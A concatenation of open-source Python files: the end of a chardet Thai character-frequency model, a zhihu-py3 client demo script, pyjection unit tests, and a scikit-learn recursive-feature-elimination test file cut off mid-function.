1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,
1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
# Model descriptor tying the two tables above together (the ratio comes
# from the training stats quoted above: "first 512 sequences: 92.6386%").
TIS620ThaiModel = {
    'charToOrderMap': TIS620CharToOrderMap,  # byte value -> frequency-order index
    'precedenceMatrix': ThaiLangModel,       # order-pair -> bigram frequency class
    'mTypicalPositiveRatio': 0.926386,       # share of common ("positive") sequences
    'keepEnglishLetter': False,              # ASCII letters are not significant here
    'charsetName': "TIS-620"
}
# flake8: noqa
| apache-2.0 |
wuhy80/zhihu-py3 | test/zhihu-test.py | 3 | 15149 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = '7sDream'
import os
import shutil
from zhihu import ZhihuClient, ActType
def test_question():
    """Demo the Question API: metadata, followers, topics, top answers.

    Uses the module-level ``client`` (a ZhihuClient, created elsewhere in
    this script).  Comments after each call show sample output.
    """
    url = 'http://www.zhihu.com/question/24825703'
    question = client.question(url)
    # Question title
    print(question.title)
    # 亲密关系之间要说「谢谢」吗?
    # Full question description
    print(question.details)
    # 从小父母和大家庭里,.......什么时候不该说"谢谢”??
    # Number of answers
    print(question.answer_num)
    # 630
    # Number of users following this question
    print(question.follower_num)
    # 4326
    # First ten followers of the question
    for _, follower in zip(range(0, 10), question.followers):
        print(follower.name)
    # J Drop
    # 熊猫
    # Steve He
    # ...
    # Topics this question belongs to
    print(question.topics)
    # ['心理学', '恋爱', '社会', '礼仪', '亲密关系']
    # Upvote count of the top-ranked answer
    print(question.top_answer.upvote_num)
    # 197
    # Author and upvote count for each of the top ten answers
    for answer in question.top_i_answers(10):
        print(answer.author.name, answer.upvote_num)
    # 49
    # 89
    # 425
    # ...
def test_answer():
    """Demo the Answer API: metadata, upvoters, content, HTML/MD export."""
    url = 'http://www.zhihu.com/question/24825703/answer/30975949'
    answer = client.answer(url)
    # Answer URL
    print(answer.url)
    # Title of the question this answer belongs to
    print(answer.question.title)
    # 关系亲密的人之间要说「谢谢」吗?
    # Author of the answer
    print(answer.author.name)
    # 甜阁下
    # Upvote count of the answer
    print(answer.upvote_num)
    # 1155
    # For each upvoter: name, upvotes/thanks received, question/answer
    # counts, and whether the account is a "zero" (inactive) user
    for _, upvoter in zip(range(1, 10), answer.upvoters):
        print(upvoter.name, upvoter.upvote_num, upvoter.thank_num,
              upvoter.question_num, upvoter.answer_num, upvoter.is_zero_user())
    # ...
    # 五月 42 15 3 35
    # 陈半边 6311 1037 3 101
    # 刘柯 3107 969 273 36
    #
    # 三零用户比例 36.364%
    # HTML content of the answer
    print(answer.content)
    # <html>
    # ...
    # </html>
    # Save as HTML in the current directory
    answer.save(filepath='.')
    # creates "亲密关系之间要说「谢谢」吗? - 甜阁下.html" in the current dir
    # Save as markdown
    answer.save(filepath='.', mode="md")
    # creates "亲密关系之间要说「谢谢」吗? - 甜阁下.md" in the current dir
def test_author():
    """Demo the Author (user) API: profile, relations, content, activity.

    Uses the module-level ``client``.  Comments after each call show
    sample output.
    """
    url = 'http://www.zhihu.com/people/7sdream'
    author = client.author(url)
    # User name
    print(author.name)
    # 7sDream
    # User motto (bio line)
    print(author.motto)
    # 二次元新居民/软件爱好者/零回答消灭者
    # Avatar URL
    print(author.photo_url)
    # http://pic3.zhimg.com/893fd554c8aa57196d5ab98530ef479a_r.jpg
    # Total upvotes received
    print(author.upvote_num)
    # 1338
    # Total thanks received
    print(author.thank_num)
    # 468
    # Number of users this author follows
    print(author.followee_num)
    # 82
    # First ten followees
    for _, followee in zip(range(0, 10), author.followees):
        print(followee.name)
    # yuwei
    # falling
    # 伍声
    # bhuztez
    # 段晓晨
    # 冯东
    # ...
    # Number of followers
    print(author.follower_num)
    # 303
    # First ten followers
    for _, follower in zip(range(0, 10), author.followers):
        print(follower.name)
    # yuwei
    # falling
    # 周非
    # 陈泓瑾
    # O1Operator
    # ...
    # Number of questions asked
    print(author.question_num)
    # 16
    # Titles of the author's questions (first ten)
    for _, question in zip(range(0, 10), author.questions):
        print(question.title)
    # 用户「松阳先生」的主页出了什么问题?
    # C++运算符重载在头文件中应该如何定义?
    # 亚马逊应用市场的应用都是正版的吗?
    # ...
    # Number of answers written
    print(author.answer_num)
    # 247
    # Upvote counts of the author's answers (first ten)
    for _, answer in zip(range(0, 10), author.answers):
        print(answer.upvote_num)
    # 0
    # 5
    # 12
    # 0
    # ...
    # Number of column posts
    print(author.post_num)
    # 0
    # Names of the author's columns
    for column in author.columns:
        print(column.name)
    # 我没有专栏T^T
    # Number of collections
    print(author.collection_num)
    # 5
    # Names of the author's collections
    for collection in author.collections:
        print(collection.name)
    # 教学精品。
    # 可以留着慢慢看~
    # OwO
    # 一句。
    # Read it later
    # Recent activities, dispatched on activity type.  The Chinese
    # %-format strings below are runtime output and are kept verbatim.
    for _, act in zip(range(0, 10), author.activities):
        print(act.content.url)
        if act.type == ActType.FOLLOW_COLUMN:
            print('%s 在 %s 关注了专栏 %s' %
                  (author.name, act.time, act.column.name))
        elif act.type == ActType.FOLLOW_QUESTION:
            print('%s 在 %s 关注了问题 %s' %
                  (author.name, act.time, act.question.title))
        elif act.type == ActType.ASK_QUESTION:
            print('%s 在 %s 提了个问题 %s' %
                  (author.name, act.time, act.question.title))
        elif act.type == ActType.UPVOTE_POST:
            print('%s 在 %s 赞同了专栏 %s 中 %s 的文章 %s, '
                  '此文章赞同数 %d, 评论数 %d' %
                  (author.name, act.time, act.post.column.name,
                   act.post.author.name, act.post.title, act.post.upvote_num,
                   act.post.comment_num))
        elif act.type == ActType.PUBLISH_POST:
            print('%s 在 %s 在专栏 %s 中发布了文章 %s, '
                  '此文章赞同数 %d, 评论数 %d' %
                  (author.name, act.time, act.post.column.name,
                   act.post.title, act.post.upvote_num,
                   act.post.comment_num))
        elif act.type == ActType.UPVOTE_ANSWER:
            print('%s 在 %s 赞同了问题 %s 中 %s(motto: %s) 的回答, '
                  '此回答赞同数 %d' %
                  (author.name, act.time, act.answer.question.title,
                   act.answer.author.name, act.answer.author.motto,
                   act.answer.upvote_num))
        elif act.type == ActType.ANSWER_QUESTION:
            print('%s 在 %s 回答了问题 %s 此回答赞同数 %d' %
                  (author.name, act.time, act.answer.question.title,
                   act.answer.upvote_num))
        elif act.type == ActType.FOLLOW_TOPIC:
            print('%s 在 %s 关注了话题 %s' %
                  (author.name, act.time, act.topic.name))
def test_collection():
    """Demo the Collection API: metadata, followers, contained answers."""
    url = 'http://www.zhihu.com/collection/28698204'
    collection = client.collection(url)
    # Collection name
    print(collection.name)
    # 可以用来背的答案
    # Number of users following the collection
    print(collection.follower_num)
    # 6343
    # First ten followers of the collection
    for _, follower in zip(range(0, 10), collection.followers):
        print(follower.name)
    # 花椰菜
    # 邱火羽白
    # 枫丹白露
    # ...
    # Name of the collection's creator
    print(collection.owner.name)
    # 7sDream
    # Upvote counts of the answers in the collection (first ten)
    for _, answer in zip(range(0, 10), collection.answers):
        print(answer.upvote_num)
    # 2561
    # 535
    # 223
    # ...
    # Titles of the questions in the collection (first ten)
    for _, question in zip(range(0, 10), collection.questions):
        print(question.title)
    # 如何完成标准的平板支撑?
    # 有没有适合 Android 开发初学者的 App 源码推荐?
    # 如何挑逗女朋友?
    # 有哪些计算机的书适合推荐给大一学生?
    # ...
def test_column():
    """Demo the Column API: name, followers, posts."""
    url = 'http://zhuanlan.zhihu.com/xiepanda'
    column = client.column(url)
    # Column name
    print(column.name)
    # 谢熊猫出没注意
    # Number of followers
    print(column.follower_num)
    # 73570
    # Number of posts
    print(column.post_num)
    # 68
    # Titles of the first ten posts
    for _, post in zip(range(0, 10), column.posts):
        print(post.title)
    # 伦敦,再见。London, Pride.
    # 为什么你来到伦敦?——没有抽到h1b
    # “城邦之国”新加坡强在哪?
    # ...
def test_post():
    """Exercise the Post API: url, title, column, author, counters, save."""
    url = 'http://zhuanlan.zhihu.com/xiepanda/19950456'
    post = client.post(url)
    # get the post's url
    print(post.url)
    # get the post's title
    print(post.title)
    # 为什么最近有很多名人,比如比尔盖茨,马斯克、霍金等,让人们警惕人工智能?
    # get the name of the column the post belongs to
    print(post.column.name)
    # 谢熊猫出没注意
    # get the author's name
    print(post.author.name)
    # 谢熊猫君
    # get the upvote count
    print(post.upvote_num)
    # 18491
    # get the comment count
    print(post.comment_num)
    # 1748
    # save the post as markdown
    post.save(filepath='.')
    # creates, in the current directory:
    # 为什么最近有很多名人,比如比尔盖茨,马斯克、霍金等,让人们警惕人工智能? - 谢熊猫君.md
def test_topic():
    """Exercise the Topic API: metadata, followers, topic tree, answers."""
    url = 'http://www.zhihu.com/topic/19947695/'
    topic = client.topic(url)
    # get the topic's url
    print(topic.url)
    # http://www.zhihu.com/topic/19947695/
    # get the topic's name
    print(topic.name)
    # 深网(Deep Web)
    # get the topic's description
    print(topic.description)
    # 暗网(英语:Deep Web,又称深网、不可见网、隐藏网)
    # get the topic's avatar url
    print(topic.photo_url)
    # http://pic1.zhimg.com/a3b0d77c052e45399da1fe26fb4c9734_r.jpg
    # get the number of followers
    print(topic.follower_num)
    # 3309
    # iterate over the followers (first 10 only)
    for _, follower in zip(range(0, 10), topic.followers):
        print(follower.name, follower.motto)
        # 韦小宝 韦小宝
        # 吉陆遥 吉陆遥
        # qingyuan ma qingyuan ma
        # ...
    # get the parent topics (first 10 only)
    for _, parent in zip(range(0, 10), topic.parents):
        print(parent.name)
        # 互联网
    # get the child topics (first 10 only)
    for _, child in zip(range(0, 10), topic.children):
        print(child.name)
        # Tor
    # get the top (best) authors of the topic (first 10 only)
    for _, author in zip(range(0, 10), topic.top_authors):
        print(author.name, author.motto)
        # Ben Chen
        # acel rovsion 我只不过规范基点上的建构论者
        # 沈万马
        # ...
    # get the highlighted answers under the topic (first 10 only)
    for _, ans in zip(range(0, 10), topic.top_answers):
        print(ans.question.title, ans.author.name, ans.upvote_num)
        # 《纸牌屋》中提到的深网 (Deep Web) 是什么? Ben Chen 2956
        # 黑客逃避追踪,为什么要用虚拟机 + TOR + VPN 呢? Ario 526
        # 《纸牌屋》中提到的深网 (Deep Web) 是什么? acel rovsion 420
        # ...
    # get all questions under the topic (first 10 only)
    for _, question in zip(range(0, 10), topic.questions):
        print(question.title)
        # 马里亚纳网络存在吗?
        # 玛丽亚纳网络存在吗?
        # 为什么暗网里这么多违法的东西FBI不顺藤摸瓜呢?
        # ...
    # hot questions from the topic feed, ordered hottest first (first 10 only)
    for _, q in zip(range(0, 10), topic.hot_questions):
        print(q.title)
        # 《纸牌屋》中提到的深网 (Deep Web) 是什么?
        # 黑客逃避追踪,为什么要用虚拟机 + TOR + VPN 呢?
        # 微博热传的关于暗网的变态故事是真的还是假的啊?
        # ...
def test_me():
    """
    This test is disabled by default because it performs subjective,
    state-changing operations: upvoting, downvoting, thanking, following.
    Make sure you can tell which line failed if the test errors out,
    and that you can roll back every operation performed (i.e. undo the
    upvotes, thanks, follows, ...).
    If you are sure, fill in the blank URLs below and uncomment the
    corresponding line in test().
    """
    answer = client.answer('')  # fill in an answer URL; must not be your own answer
    post = client.post('')  # fill in a post URL; must not be your own post
    author = client.author('')  # fill in a user URL; must not be yourself
    question = client.question('')  # fill in a question URL
    topic = client.topic('')  # fill in a topic URL
    collection = client.collection('')  # fill in a collection URL
    me = client.me()
    print('赞同答案...', end='')
    assert me.vote(answer, 'up')  # upvote
    assert me.vote(answer, 'down')  # downvote
    assert me.vote(answer, 'clear')  # clear the vote
    print('通过')
    print('感谢答案...', end='')
    assert me.thanks(answer)  # thank
    assert me.thanks(answer, False)  # cancel the thank
    print('通过')
    print('赞同文章...', end='')
    assert me.vote(post, 'up')  # upvote
    assert me.vote(post, 'down')  # downvote
    assert me.vote(post, 'clear')  # clear the vote
    print('通过')
    print('关注用户...', end='')
    assert me.follow(author)  # follow
    assert me.follow(author, False)  # unfollow
    print('通过')
    print('关注问题...', end='')
    assert me.follow(question)  # follow
    assert me.follow(question, False)  # unfollow
    print('通过')
    print('关注话题...', end='')
    assert me.follow(topic)  # follow
    assert me.follow(topic, False)  # unfollow
    print('通过')
    print('关注收藏夹...', end='')
    assert me.follow(collection)  # follow
    assert me.follow(collection, False)  # unfollow
    print('通过')
def test():
    """Run the full (read-only) test suite in order.

    test_me() is intentionally commented out because it performs
    state-changing operations; see its docstring before enabling it.
    """
    test_question()
    test_answer()
    test_author()
    test_collection()
    test_column()
    test_post()
    test_topic()
    # test_me()
if __name__ == '__main__':
    Cookies_File = 'cookies.json'
    BASE_DIR = os.path.dirname(os.path.realpath(__file__))
    TEST_DIR = os.path.join(BASE_DIR, 'test')
    print("Test dir: ", TEST_DIR)
    # start from a clean scratch directory
    if os.path.exists(TEST_DIR):
        print("Cleaning it...", end='')
        shutil.rmtree(TEST_DIR)
        print("Done")
    else:
        print("Test dir not exist.")
    os.chdir(BASE_DIR)
    # reuse saved cookies when available, otherwise log in interactively
    # and persist the cookies for the next run
    if os.path.isfile(Cookies_File):
        print("Cookies file found.")
        client = ZhihuClient(Cookies_File)
    else:
        print("Cookies file not exist, please login...")
        client = ZhihuClient()
        cookies_str = client.login_in_terminal()
        with open(Cookies_File, 'w') as f:
            f.write(cookies_str)
    print("Making test dir...", end="")
    os.mkdir(TEST_DIR)
    print("Done", end="\n\n")
    os.chdir(TEST_DIR)
    print("===== test start =====")
    import timeit
    try:
        # run the whole suite exactly once and measure the wall time
        time = timeit.timeit(
            'test()', setup='from __main__ import test', number=1)
        print('===== test passed =====')
        print('no error happen')
        print('time used: {0} ms'.format(time * 1000))
    except Exception as e:
        print('===== test failed =====')
        raise e
    finally:
        # always remove the scratch directory, pass or fail
        os.chdir(BASE_DIR)
        print("Cleaning...", end='')
        shutil.rmtree(TEST_DIR)
        print("Done")
| mit |
Darkheir/pyjection | tests/unit/test_dependency_injector.py | 1 | 3227 | from unittest import TestCase
from unittest.mock import Mock
from pyjection.dependency_injector import DependencyInjector
from pyjection.service import Service
class TestDependencyInjector(TestCase):
    """Unit tests for DependencyInjector registration and resolution."""

    def setUp(self):
        # fresh injector per test so registrations don't leak between tests
        self.injector = DependencyInjector()

    def test_register(self):
        """register() with an explicit identifier returns a Service."""
        result = self.injector.register(Mock, 'identifier')
        self.assertIsInstance(result, Service)

    def test_register_without_identifier(self):
        """register() derives an identifier from the class when omitted."""
        result = self.injector.register(Mock)
        self.assertIsInstance(result, Service)

    def test_register_singleton_returns_service(self):
        result = self.injector.register_singleton(Mock, 'identifier')
        self.assertIsInstance(result, Service)

    def test_register_singleton(self):
        """register_singleton() marks the service as a singleton."""
        result = self.injector.register_singleton(Mock, 'identifier')
        self.assertTrue(result.is_singleton)

    def test_register_singleton_without_identifier(self):
        result = self.injector.register_singleton(Mock)
        self.assertTrue(result.is_singleton)

    def test_has_service_returns_false(self):
        success = self.injector.has_service('no_service')
        self.assertFalse(success)

    def test_has_service_returns_true(self):
        self.injector._services['fake_service'] = None
        success = self.injector.has_service('fake_service')
        self.assertTrue(success)

    def test_has_service_with_class(self):
        # a class can be used as a lookup key; it maps to its lowercase name
        self.injector._services['mock'] = None
        success = self.injector.has_service(Mock)
        self.assertTrue(success)

    def test_get_error(self):
        """get() on an unknown identifier raises."""
        with self.assertRaises(Exception):
            self.injector.get('no_service')

    def test_get_singleton_class(self):
        self._register_singleton()
        subject1 = self.injector.get('fake_service')
        self.assertIsInstance(subject1, Mock)

    def test_get_singleton_same_instance(self):
        """A singleton service resolves to the same instance every time."""
        self._register_singleton()
        subject1 = self.injector.get('fake_service')
        subject2 = self.injector.get('fake_service')
        self.assertEqual(subject1, subject2)

    def _register_singleton(self):
        # helper: install a singleton Mock service under 'fake_service'
        fake_service = Service(Mock)
        fake_service.is_singleton = True
        self.injector._services['fake_service'] = fake_service

    def test_get_class(self):
        fake_service = Service(Mock())
        self.injector._services['fake_service'] = fake_service
        subject1 = self.injector.get('fake_service')
        self.assertIsInstance(subject1, Mock)

    def test_get_uninstantiated(self):
        """get_uninstantiated() returns the registered subject untouched."""
        mock = Mock()
        fake_service = Service(mock)
        self.injector._services['fake_service'] = fake_service
        subject1 = self.injector.get_uninstantiated('fake_service')
        self.assertIs(subject1, mock)

    def test_get_class_identifier(self):
        fake_service = Service(Mock)
        self.injector._services['mock'] = fake_service
        subject1 = self.injector.get(Mock)
        self.assertIsInstance(subject1, Mock)

    def test_get_instance(self):
        """A service registered with an instance resolves to that instance."""
        subject = Mock()
        fake_service = Service(subject)
        self.injector._services['fake_service'] = fake_service
        result = self.injector.get('fake_service')
        self.assertEqual(subject, result)
| mit |
pypot/scikit-learn | sklearn/feature_selection/tests/test_rfe.py | 209 | 11733 | """
Testing Recursive feature elimination
"""
import warnings
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
from nose.tools import assert_equal, assert_true
from scipy import sparse
from sklearn.feature_selection.rfe import RFE, RFECV
from sklearn.datasets import load_iris, make_friedman1
from sklearn.metrics import zero_one_loss
from sklearn.svm import SVC, SVR
from sklearn.ensemble import RandomForestClassifier
from sklearn.cross_validation import cross_val_score
from sklearn.utils import check_random_state
from sklearn.utils.testing import ignore_warnings
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import assert_greater
from sklearn.metrics import make_scorer
from sklearn.metrics import get_scorer
class MockClassifier(object):
    """Minimal estimator stub used to exercise RFE without a real model.

    Implements just enough of the scikit-learn estimator API
    (fit/predict/score/get_params/set_params) for the recursive
    feature-elimination code paths to run.
    """

    def __init__(self, foo_param=0):
        self.foo_param = foo_param

    def fit(self, X, Y):
        """Record a uniform coefficient per feature; X and Y must align."""
        assert_true(len(X) == len(Y))
        self.coef_ = np.ones(X.shape[1], dtype=np.float64)
        return self

    def predict(self, T):
        """Return the number of samples instead of real predictions."""
        return T.shape[0]

    # RFE probes several prediction entry points; alias them all
    predict_proba = predict
    decision_function = predict
    transform = predict

    def score(self, X=None, Y=None):
        """Dummy score: 1.0 when foo_param exceeds 1, otherwise 0.0."""
        return 1. if self.foo_param > 1 else 0.

    def get_params(self, deep=True):
        return {'foo_param': self.foo_param}

    def set_params(self, **params):
        # parameters are intentionally ignored by this stub
        return self
def test_rfe_set_params():
    """RFE configured via the deprecated estimator_params must predict
    the same as an estimator configured directly."""
    generator = check_random_state(0)
    iris = load_iris()
    # append 6 noise features to iris
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    y = iris.target
    clf = SVC(kernel="linear")
    rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
    y_pred = rfe.fit(X, y).predict(X)
    clf = SVC()
    with warnings.catch_warnings(record=True):
        # estimator_params is deprecated
        rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1,
                  estimator_params={'kernel': 'linear'})
        y_pred2 = rfe.fit(X, y).predict(X)
    assert_array_equal(y_pred, y_pred2)
def test_rfe_features_importance():
    """RFE driven by feature_importances_ (random forest) should select
    the same features as RFE driven by coef_ (linear SVC) on noisy iris."""
    generator = check_random_state(0)
    iris = load_iris()
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    y = iris.target
    clf = RandomForestClassifier(n_estimators=20,
                                 random_state=generator, max_depth=2)
    rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
    rfe.fit(X, y)
    assert_equal(len(rfe.ranking_), X.shape[1])
    clf_svc = SVC(kernel="linear")
    rfe_svc = RFE(estimator=clf_svc, n_features_to_select=4, step=0.1)
    rfe_svc.fit(X, y)
    # Check if the supports are equal
    assert_array_equal(rfe.get_support(), rfe_svc.get_support())
def test_rfe_deprecation_estimator_params():
    """Passing estimator_params to RFE/RFECV must emit a DeprecationWarning
    with exactly the documented message."""
    deprecation_message = ("The parameter 'estimator_params' is deprecated as "
                           "of version 0.16 and will be removed in 0.18. The "
                           "parameter is no longer necessary because the "
                           "value is set via the estimator initialisation or "
                           "set_params method.")
    generator = check_random_state(0)
    iris = load_iris()
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    y = iris.target
    assert_warns_message(DeprecationWarning, deprecation_message,
                         RFE(estimator=SVC(), n_features_to_select=4, step=0.1,
                             estimator_params={'kernel': 'linear'}).fit,
                         X=X,
                         y=y)
    assert_warns_message(DeprecationWarning, deprecation_message,
                         RFECV(estimator=SVC(), step=1, cv=5,
                               estimator_params={'kernel': 'linear'}).fit,
                         X=X,
                         y=y)
def test_rfe():
    """RFE must behave identically on dense and sparse input and recover
    the original iris features from noisy data."""
    generator = check_random_state(0)
    iris = load_iris()
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    X_sparse = sparse.csr_matrix(X)
    y = iris.target
    # dense model
    clf = SVC(kernel="linear")
    rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
    rfe.fit(X, y)
    X_r = rfe.transform(X)
    clf.fit(X_r, y)
    assert_equal(len(rfe.ranking_), X.shape[1])
    # sparse model
    clf_sparse = SVC(kernel="linear")
    rfe_sparse = RFE(estimator=clf_sparse, n_features_to_select=4, step=0.1)
    rfe_sparse.fit(X_sparse, y)
    X_r_sparse = rfe_sparse.transform(X_sparse)
    # the 6 noise features must be dropped, recovering the iris data
    assert_equal(X_r.shape, iris.data.shape)
    assert_array_almost_equal(X_r[:10], iris.data[:10])
    assert_array_almost_equal(rfe.predict(X), clf.predict(iris.data))
    assert_equal(rfe.score(X, y), clf.score(iris.data, iris.target))
    # dense and sparse paths must agree
    assert_array_almost_equal(X_r, X_r_sparse.toarray())
def test_rfe_mockclassifier():
    """RFE must run with a minimal estimator exposing only fit/coef_."""
    generator = check_random_state(0)
    iris = load_iris()
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    y = iris.target
    # dense model
    clf = MockClassifier()
    rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
    rfe.fit(X, y)
    X_r = rfe.transform(X)
    clf.fit(X_r, y)
    assert_equal(len(rfe.ranking_), X.shape[1])
    assert_equal(X_r.shape, iris.data.shape)
def test_rfecv():
    """RFECV must recover the original iris features on dense and sparse
    input, with the default score, custom scorers, and step > 1."""
    generator = check_random_state(0)
    iris = load_iris()
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    y = list(iris.target)   # regression test: list should be supported
    # Test using the score function
    rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5)
    rfecv.fit(X, y)
    # non-regression test for missing worst feature:
    assert_equal(len(rfecv.grid_scores_), X.shape[1])
    assert_equal(len(rfecv.ranking_), X.shape[1])
    X_r = rfecv.transform(X)
    # All the noisy variable were filtered out
    assert_array_equal(X_r, iris.data)
    # same in sparse
    rfecv_sparse = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5)
    X_sparse = sparse.csr_matrix(X)
    rfecv_sparse.fit(X_sparse, y)
    X_r_sparse = rfecv_sparse.transform(X_sparse)
    assert_array_equal(X_r_sparse.toarray(), iris.data)
    # Test using a customized loss function
    scoring = make_scorer(zero_one_loss, greater_is_better=False)
    rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
                  scoring=scoring)
    ignore_warnings(rfecv.fit)(X, y)
    X_r = rfecv.transform(X)
    assert_array_equal(X_r, iris.data)
    # Test using a scorer
    scorer = get_scorer('accuracy')
    rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
                  scoring=scorer)
    rfecv.fit(X, y)
    X_r = rfecv.transform(X)
    assert_array_equal(X_r, iris.data)
    # Test fix on grid_scores: a constant scorer yields constant grid scores
    def test_scorer(estimator, X, y):
        return 1.0
    rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
                  scoring=test_scorer)
    rfecv.fit(X, y)
    assert_array_equal(rfecv.grid_scores_, np.ones(len(rfecv.grid_scores_)))
    # Same as the first two tests, but with step=2
    rfecv = RFECV(estimator=SVC(kernel="linear"), step=2, cv=5)
    rfecv.fit(X, y)
    # 10 features eliminated 2 at a time -> 6 grid points
    assert_equal(len(rfecv.grid_scores_), 6)
    assert_equal(len(rfecv.ranking_), X.shape[1])
    X_r = rfecv.transform(X)
    assert_array_equal(X_r, iris.data)
    rfecv_sparse = RFECV(estimator=SVC(kernel="linear"), step=2, cv=5)
    X_sparse = sparse.csr_matrix(X)
    rfecv_sparse.fit(X_sparse, y)
    X_r_sparse = rfecv_sparse.transform(X_sparse)
    assert_array_equal(X_r_sparse.toarray(), iris.data)
def test_rfecv_mockclassifier():
    """RFECV must run with the minimal MockClassifier estimator."""
    generator = check_random_state(0)
    iris = load_iris()
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    y = list(iris.target)   # regression test: list should be supported
    # Test using the score function
    rfecv = RFECV(estimator=MockClassifier(), step=1, cv=5)
    rfecv.fit(X, y)
    # non-regression test for missing worst feature:
    assert_equal(len(rfecv.grid_scores_), X.shape[1])
    assert_equal(len(rfecv.ranking_), X.shape[1])
def test_rfe_estimator_tags():
    """RFE must inherit the wrapped estimator's type so that
    cross-validation is stratified for classifiers."""
    rfe = RFE(SVC(kernel='linear'))
    assert_equal(rfe._estimator_type, "classifier")
    # make sure that cross-validation is stratified
    iris = load_iris()
    score = cross_val_score(rfe, iris.data, iris.target)
    assert_greater(score.min(), .7)
def test_rfe_min_step():
    """A fractional step that floors to zero must still eliminate at
    least one feature per iteration."""
    n_features = 10
    X, y = make_friedman1(n_samples=50, n_features=n_features, random_state=0)
    n_samples, n_features = X.shape
    estimator = SVR(kernel="linear")
    # Test when floor(step * n_features) <= 0
    selector = RFE(estimator, step=0.01)
    sel = selector.fit(X, y)
    assert_equal(sel.support_.sum(), n_features // 2)
    # Test when step is between (0,1) and floor(step * n_features) > 0
    selector = RFE(estimator, step=0.20)
    sel = selector.fit(X, y)
    assert_equal(sel.support_.sum(), n_features // 2)
    # Test when step is an integer
    selector = RFE(estimator, step=5)
    sel = selector.fit(X, y)
    assert_equal(sel.support_.sum(), n_features // 2)
def test_number_of_subsets_of_features():
    """The iteration-count formulas before and after optimization #4534
    must agree for RFE (via max(ranking_)) and RFECV (via grid_scores_)."""
    # In RFE, 'number_of_subsets_of_features'
    # = the number of iterations in '_fit'
    # = max(ranking_)
    # = 1 + (n_features + step - n_features_to_select - 1) // step
    # After optimization #4534, this number
    # = 1 + np.ceil((n_features - n_features_to_select) / float(step))
    # This test case is to test their equivalence, refer to #4534 and #3824
    def formula1(n_features, n_features_to_select, step):
        return 1 + ((n_features + step - n_features_to_select - 1) // step)

    def formula2(n_features, n_features_to_select, step):
        return 1 + np.ceil((n_features - n_features_to_select) / float(step))

    # RFE
    # Case 1, n_features - n_features_to_select is divisible by step
    # Case 2, n_features - n_features_to_select is not divisible by step
    n_features_list = [11, 11]
    n_features_to_select_list = [3, 3]
